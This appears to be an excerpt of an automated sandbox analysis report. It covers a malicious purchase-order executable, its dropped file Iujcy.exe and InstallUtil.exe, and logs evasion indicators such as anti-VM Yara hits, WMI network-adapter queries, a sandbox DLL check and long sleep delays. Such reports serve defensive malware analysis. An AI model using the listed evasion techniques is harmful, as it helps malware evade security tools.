Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 8044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Iujcy.exe PID: 5428, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, 00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Iujcy.exe, 0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory allocated: D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: EF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: 2D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: 2B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 5110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Memory allocated: 26E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2DF0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 4FB0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598276	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 598170	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597998	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597404	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Thread delayed: delay time: 597187	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Window / User API: threadDelayed 912			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe	Window / User API: threadDelayed 3044			Jump to behavior

Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 1200	Thread sleep count: 912 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 1200	Thread sleep count: 3044 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Iujcy.exe TID: 6964	Thread sleep time: -598578s >= -30000s	Jump to behavior
